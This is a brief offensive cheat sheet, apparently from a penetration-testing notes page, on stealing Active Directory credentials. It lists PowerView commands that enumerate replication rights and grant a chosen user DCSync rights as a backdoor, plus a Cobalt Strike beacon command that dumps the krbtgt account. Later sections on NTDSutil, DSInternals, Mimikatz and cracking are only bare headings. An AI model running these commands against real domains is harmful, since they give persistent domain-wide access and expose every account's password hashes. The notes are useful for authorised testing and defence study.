DCSync Backdoor

# Enumerate
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -eq "DC=Marvel,DC=local" -and $_.ObjectAceType -match "DS-Replication"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier 

# Command
Add-DomainObjectAcl -TargetIdentity "DC=marvel,DC=local" -PrincipalIdentity user4 -Rights DCSync

beacon> dcsync dev.cyberbotic.io DEV\krbtgt

NTDS Dump

NTDSutil

Then use the DSInternals script to extract all the hashed from this dump.

Mimikatz

Invoke DCSync

Cracking

Last updated